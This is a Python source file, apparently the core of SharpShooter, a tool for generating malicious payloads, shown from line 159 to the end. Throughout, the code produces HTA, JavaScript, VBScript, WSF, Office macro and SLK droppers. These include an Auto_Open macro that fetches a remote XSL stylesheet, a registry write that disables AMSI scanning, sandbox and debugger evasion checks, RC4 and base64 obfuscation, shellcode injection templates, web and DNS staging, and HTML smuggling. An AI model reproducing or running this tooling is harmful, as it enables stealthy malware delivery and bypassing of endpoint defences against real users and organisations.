159 | if(args.payload == "slk"): 160 | print("\033[1;31m[!]\033[0;0m Shellcode must not contain null bytes") 161 | 162 | return args 163 | 164 | def read_file(self, f): 165 | with open(f, 'r') as fs: 166 | content = fs.read() 167 | return content 168 | 169 | def rand_key(self, n): 170 | return ''.join([random.choice(string.lowercase) for i in xrange(n)]) 171 | 172 | def gzip_str(self, string_): 173 | fgz = BytesIO() 174 | try: 175 | string_ = string_.encode() 176 | except: 177 | pass 178 | 179 | gzip_obj = gzip.GzipFile(mode='wb', fileobj=fgz) 180 | gzip_obj.write(string_) 181 | gzip_obj.close() 182 | return fgz 183 | 184 | def rc4(self, key, data): 185 | S = range(256) 186 | j = 0 187 | out = [] 188 | 189 | for i in range(256): 190 | j = (j + S[i] + ord(key[i % len(key)])) % 256 191 | S[i], S[j] = S[j], S[i] 192 | 193 | i = j = 0 194 | for char in data: 195 | i = (i + 1) % 256 196 | j = (j + S[i]) % 256 197 | S[i], S[j] = S[j], S[i] 198 | out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256])) 199 | 200 | return ''.join(out) 201 | 202 | def run(self, args): 203 | 204 | template_body = "" 205 | template_base = "templates/sharpshooter." 206 | shellcode_delivery = False 207 | shellcode_gzip = "" 208 | payload_type = 0 209 | 210 | macro_template = """ Set XML = CreateObject("Microsoft.XMLDOM") 211 | XML.async = False 212 | Set xsl = XML 213 | xsl.Load "%s" 214 | XML.transformNode xsl""" % (args.awlurl) 215 | 216 | macro_amsi_stub = """ regpath = "HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable" 217 | Set oWSS = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") 218 | e = 0 219 | On Error Resume Next 220 | r = oWSS.RegRead(regpath) 221 | If r <> 0 Then 222 | oWSS.RegWrite regpath, "0", "REG_DWORD" 223 | e = 1 224 | End If 225 | 226 | If Err.Number <> 0 Then 227 | oWSS.RegWrite regpath, "0", "REG_DWORD" 228 | e = 1 229 | Err.Clear 230 | End If 231 | 232 | %s 233 | 234 | If e Then 235 | oWSS.RegWrite regpath, "1", "REG_DWORD" 236 | End If 237 | 238 | On Error GoTo 0""" % (macro_template) 239 | 240 | macro_stager = """Sub Auto_Open() 241 | %MACRO_CODE% 242 | End Sub""" 243 | 244 | if(args.amsi and args.payload=="macro"): 245 | macro_stager = macro_stager.replace("%MACRO_CODE%", macro_amsi_stub) 246 | else: 247 | macro_stager = macro_stager.replace("%MACRO_CODE%", macro_template) 248 | 249 | dotnet_version = 1 250 | stageless_payload = False 251 | 252 | if not args.payload=="slk": 253 | dotnet_version = int(args.dotnetver) 254 | 255 | if((args.stageless or stageless_payload is True) and dotnet_version == 2): 256 | template_base = "templates/stageless." 257 | elif((args.stageless or stageless_payload is True) and dotnet_version == 4): 258 | template_base = "templates/stagelessv4." 259 | elif(dotnet_version == 4): 260 | template_base = "templates/sharpshooterv4." 261 | 262 | #print(template_base) 263 | 264 | if(args.payload == "hta"): 265 | payload_type = 1 266 | elif(args.payload == "js"): 267 | payload_type = 2 268 | elif(args.payload == "jse"): 269 | payload_type = 3 270 | elif(args.payload == "vba"): 271 | payload_type = 4 272 | elif(args.payload == "vbe"): 273 | payload_type = 5 274 | elif(args.payload == "vbs"): 275 | payload_type = 6 276 | elif(args.payload == "wsf"): 277 | payload_type = 7 278 | elif(args.payload == "macro"): 279 | payload_type = 8 280 | elif(args.payload == "slk"): 281 | payload_type = 9 282 | 283 | try: 284 | payload_type = int(payload_type) 285 | if (payload_type < 1 or payload_type > 9): 286 | raise Exception 287 | 288 | if(payload_type == 1): 289 | if(args.comtechnique): 290 | template_body = self.read_file(template_base + "js") 291 | else: 292 | template_body = self.read_file(template_base + "vbs") 293 | file_type = "hta" 294 | elif(payload_type == 2): 295 | template_body = self.read_file(template_base + "js") 296 | file_type = "js" 297 | elif(payload_type == 3): 298 | template_body = self.read_file(template_base + "js") 299 | file_type = "js" 300 | elif(payload_type == 4): 301 | print("\n\033[93m[!]\033[0;0m VBA support is still under development") 302 | raise Exception 303 | #template_body = read_file(template_base + "vba") 304 | #file_type = "vba" 305 | elif(payload_type == 5): 306 | if(args.comtechnique): 307 | template_body = self.read_file(template_base + "js") 308 | else: 309 | template_body = self.read_file(template_base + "vbs") 310 | file_type = "vbs" 311 | elif(payload_type == 6): 312 | if(args.comtechnique): 313 | template_body = self.read_file(template_base + "js") 314 | else: 315 | template_body = self.read_file(template_base + "vbs") 316 | file_type = "vbs" 317 | elif(payload_type == 7): 318 | template_body = self.read_file(template_base + "js") 319 | file_type = "wsf" 320 | elif(payload_type == 8): 321 | template_body = self.read_file(template_base + "js") 322 | file_type = "macro" 323 | elif(payload_type == 9): 324 | file_type = "slk" 325 | except Exception as e: 326 | print("\n\033[1;31m[!]\033[0;0m Incorrect choice") 327 | 328 | sandbox_techniques="" 329 | techniques_list = [] 330 | sandboxevasion_type = 0 331 | 332 | if(args.sandbox): 333 | techniques_list = args.sandbox.split(",") 334 | 335 | while True: 336 | if(techniques_list): 337 | sandboxevasion_type = techniques_list[0] 338 | techniques_list.remove(techniques_list[0]) 339 | if not sandboxevasion_type: 340 | sandboxevasion_type = "0" 341 | else: 342 | sandboxevasion_type = "0" 343 | 344 | try: 345 | if("1" in sandboxevasion_type): 346 | domainkey = sandboxevasion_type.split("=") 347 | domain_name = domainkey[1] 348 | sandboxevasion_type = domainkey[0] 349 | 350 | sandboxevasion_type = int(sandboxevasion_type) 351 | if sandboxevasion_type > 5: raise Exception 352 | 353 | if (sandboxevasion_type == 1): 354 | domain_name = domain_name.strip() 355 | 356 | if not domain_name: raise Exception 357 | 358 | if len(domain_name) <= 1: 359 | raise Exception 360 | else: 361 | print("\033[1;34m[*]\033[0;0m Adding keying for %s domain" % (domain_name)) 362 | if("js" in file_type or args.comtechnique): 363 | sandbox_techniques += "\to.CheckPlease(0, \"%s\")\n" % domain_name 364 | else: 365 | sandbox_techniques += "o.CheckPlease 0, \"%s\"\n" % domain_name 366 | continue 367 | elif(sandboxevasion_type == 2): 368 | print("\033[1;34m[*]\033[0;0m Keying to domain joined systems") 369 | if("js" in file_type or args.comtechnique): 370 | sandbox_techniques += "\to.CheckPlease(1,\"foo\")\n" 371 | else: 372 | sandbox_techniques += "o.CheckPlease 1, \"foo\"\n" 373 | continue 374 | elif(sandboxevasion_type == 3): 375 | print("\033[1;34m[*]\033[0;0m Avoiding sandbox artifacts") 376 | 377 | if("js" in file_type or args.comtechnique): 378 | sandbox_techniques += "\to.CheckPlease(2,\"foo\")\n" 379 | else: 380 | sandbox_techniques += "o.CheckPlease 2,\"foo\"\n" 381 | continue 382 | elif(sandboxevasion_type == 4): 383 | print("\033[1;34m[*]\033[0;0m Avoiding bad MACs") 384 | 385 | if("js" in file_type or args.comtechnique): 386 | sandbox_techniques += "\to.CheckPlease(3,\"foo\")\n" 387 | else: 388 | sandbox_techniques += "o.CheckPlease 3,\"foo\"\n" 389 | continue 390 | elif(sandboxevasion_type == 5): 391 | print("\033[1;34m[*]\033[0;0m Avoiding debugging") 392 | 393 | if("js" in file_type or args.comtechnique): 394 | sandbox_techniques += "\to.CheckPlease(4,\"foo\")\n" 395 | else: 396 | sandbox_techniques += "o.CheckPlease 4,\"foo\"\n" 397 | continue 398 | elif(sandboxevasion_type == 0): 399 | break 400 | 401 | except Exception as e: 402 | print("\n\033[1;31m[!]\033[0;0m Incorrect choice") 403 | 404 | template_code = template_body.replace("%SANDBOX_ESCAPES%", sandbox_techniques) 405 | 406 | delivery_method = "1" 407 | encoded_sc = "" 408 | while True: 409 | 410 | if(args.delivery == "web"): 411 | delivery_method = "1" 412 | elif args.delivery == "dns": 413 | delivery_method = "2" 414 | else: 415 | delivery_method = "3" 416 | 417 | try: 418 | delivery_method = int(delivery_method) 419 | 420 | if args.shellcode: 421 | shellcode_payload = "y" 422 | else: 423 | shellcode_payload = "n" 424 | 425 | shellcode_payload = shellcode_payload.lower() 426 | if (shellcode_payload == "y" or shellcode_payload == "yes"): 427 | shellcode_delivery = True 428 | shellcode_template = self.read_file("templates/shellcode.cs") 429 | 430 | shellcode = [] 431 | 432 | sc = self.read_file(args.shellcode_file) 433 | shellcode.append(sc) 434 | 435 | shellcode = "\n".join(shellcode) 436 | 437 | shellcode_final = shellcode_template.replace("%SHELLCODE%", shellcode) 438 | shellcode_gzip = self.gzip_str(shellcode_final) 439 | 440 | elif (args.stageless or stageless_payload is True): 441 | rawsc = self.read_file(args.rawscfile) 442 | encoded_sc = base64.b64encode(rawsc) 443 | #if("vbs" in file_type or "hta" in file_type): 444 | # sc_split = [encoded_sc[i:i+100] for i in range(0, len(encoded_sc), 100)] 445 | # for i in sc_split: 446 | #else: 447 | template_code = template_code.replace("%SHELLCODE64%", encoded_sc) 448 | 449 | else: 450 | refs = args.refs 451 | namespace = args.namespace 452 | entrypoint = args.entrypoint 453 | 454 | if (shellcode_delivery): 455 | refs = "mscorlib.dll" 456 | namespace = "ShellcodeInjection.Program" 457 | entrypoint = "Main" 458 | 459 | if(delivery_method == 1 and not stageless_payload): 460 | stager = args.web 461 | 462 | if("js" in file_type or "wsf" in file_type or args.comtechnique): 463 | template_code = template_code.replace("%DELIVERY%", "o.Go(\"%s\", \"%s\", \"%s\", 1, \"%s\");" % (refs, namespace, entrypoint, stager)) 464 | else: 465 | template_code = template_code.replace("%DELIVERY%", "o.Go \"%s\", \"%s\", \"%s\", 1, \"%s\"" % (refs, namespace, entrypoint, stager)) 466 | 467 | if(delivery_method == 2 and not stageless_payload): 468 | stager = args.dns 469 | 470 | if("js" in file_type or "wsf" in file_type or args.comtechnique): 471 | template_code = template_code.replace("%DELIVERY%", "\to.Go(\"%s\", \"%s\", \"%s\", 2, \"%s\");" % (refs, namespace, entrypoint, stager)) 472 | else: 473 | template_code = template_code.replace("%DELIVERY%", "\to.Go \"%s\", \"%s\", \"%s\", 2, \"%s\"" % (refs, namespace, entrypoint, stager)) 474 | 475 | if((delivery_method == 3) and (not args.stageless) and (not stageless_payload)): 476 | stager = args.web 477 | 478 | if("js" in file_type or "wsf" in file_type or args.comtechnique): 479 | webdelivery = "\to.Go(\"%s\", \"%s\", \"%s\", 1, \"%s\");\n" % (refs, namespace, entrypoint, stager) 480 | else: 481 | webdelivery = "\to.Go \"%s\", \"%s\", \"%s\", 1, \"%s\"\n" % (refs, namespace, entrypoint, stager) 482 | 483 | stager = args.dns 484 | 485 | if("js" in file_type or "wsf" in file_type or args.comtechnique): 486 | dnsdelivery = "\to.Go(\"%s\", \"%s\", \"%s\", 2, \"%s\");" % (refs, namespace, entrypoint, stager) 487 | else: 488 | dnsdelivery = "\to.Go \"%s\", \"%s\", \"%s\", 2, \"%s\"" % (refs, namespace, entrypoint, stager) 489 | 490 | deliverycode = webdelivery + dnsdelivery 491 | template_code = template_code.replace("%DELIVERY%", deliverycode) 492 | 493 | break 494 | except Exception as e: 495 | print(e) 496 | print("\n\033[1;31m[!]\033[0;0m Incorrect choice") 497 | sys.exit(-1) 498 | 499 | amsi_bypass = "" 500 | outputfile = args.output 501 | outputfile_payload = outputfile + "." + file_type 502 | 503 | if args.amsi and not args.payload == "macro": 504 | if(args.comtechnique): 505 | amsi_bypass = amsikiller.amsi_stub("js", args.amsi, outputfile_payload) 506 | template_code = amsi_bypass + template_code + "}" 507 | else: 508 | amsi_bypass = amsikiller.amsi_stub(file_type, args.amsi, outputfile_payload) 509 | 510 | if "vb" in file_type or "hta" in file_type: 511 | template_code = amsi_bypass + template_code + "\nOn Error Goto 0\nEnd If" 512 | else: 513 | template_code = amsi_bypass + template_code + "}" 514 | 515 | #print(template_code) 516 | 517 | key = self.rand_key(10) 518 | payload_encrypted = self.rc4(key, template_code) 519 | payload_encoded = base64.b64encode(payload_encrypted) 520 | 521 | awl_payload_simple = "" 522 | 523 | if("js" in file_type or args.comtechnique): 524 | harness = self.read_file("templates/harness.js") 525 | payload = harness.replace("%B64PAYLOAD%", payload_encoded) 526 | payload = payload.replace("%KEY%", "'%s'" % (key)) 527 | payload_minified = jsmin(payload) 528 | awl_payload_simple = template_code 529 | elif("wsf" in file_type): 530 | harness = self.read_file("templates/harness.wsf") 531 | payload = harness.replace("%B64PAYLOAD%", payload_encoded) 532 | payload = payload.replace("%KEY%", "'%s'" % (key)) 533 | payload_minified = jsmin(payload) 534 | elif("hta" in file_type): 535 | harness = self.read_file("templates/harness.hta") 536 | payload = harness.replace("%B64PAYLOAD%", payload_encoded) 537 | payload = payload.replace("%KEY%", "'%s'" % (key)) 538 | payload_minified = jsmin(payload) 539 | elif("vba" in file_type): 540 | harness = self.read_file("templates/harness.vba") 541 | payload = harness.replace("%B64PAYLOAD%", payload_encoded) 542 | payload = payload.replace("%KEY%", "\"%s\"" % (key)) 543 | payload_minified = jsmin(payload) 544 | elif("slk" in file_type): 545 | pass 546 | else: 547 | harness = self.read_file("templates/harness.vbs") 548 | payload = harness.replace("%B64PAYLOAD%", payload_encoded) 549 | payload = payload.replace("%KEY%", "\"%s\"" % (key)) 550 | 551 | if (payload_type == 3): 552 | file_type = "jse" 553 | elif (payload_type == 5): 554 | file_type = "vbe" 555 | 556 | f = open("output/" + outputfile_payload, 'w') 557 | #print(payload) 558 | if(payload_type == 8): 559 | f.write(macro_stager) 560 | 561 | if(payload_type == 9): 562 | payload = excel4.generate_slk(args.rawscfile) 563 | 564 | if(args.comtechnique): 565 | if not args.awltechnique or args.awltechnique == "wmic": 566 | payload_file = "output/" + outputfile + ".xsl" 567 | else: 568 | payload_file = "output/" + outputfile + ".sct" 569 | 570 | #if("js" in file_type or "hta" in file_type or "wsf" in file_type): 571 | awl_payload = awl.create_com_stager(args.comtechnique, file_type, args.awlurl, payload_file, awl_payload_simple, args.amsi) 572 | #else: 573 | # awl_payload = awl.create_com_stager(args.comtechnique, file_type, args.awlurl, payload_file, payload) 574 | f.write(awl_payload) 575 | elif("js" in file_type or "hta" in file_type or "wsf" in file_type): 576 | f.write(payload_minified) 577 | else: 578 | f.write(payload) 579 | f.close() 580 | 581 | print("\033[1;34m[*]\033[0;0m Written delivery payload to output/%s" % outputfile_payload) 582 | if shellcode_delivery: 583 | outputfile_shellcode = outputfile + ".payload" 584 | with open("output/" + outputfile_shellcode, 'w') as f: 585 | gzip_encoded = base64.b64encode(shellcode_gzip.getvalue()) 586 | f.write(gzip_encoded) 587 | f.close() 588 | print("\033[1;34m[*]\033[0;0m Written shellcode payload to output/%s" % outputfile_shellcode) 589 | 590 | if "vba" not in file_type: 591 | if (args.smuggle): 592 | key = self.rand_key(10) 593 | template = "" 594 | template = args.template 595 | embedinhtml.run_embedInHtml(key, "./output/" + outputfile_payload, "./output/" + outputfile + ".html", template) 596 | if __name__ == "__main__": 597 | ss = SharpShooter() 598 | args = ss.validate_args() 599 | ss.run(args) --------------------------------------------------------------------------------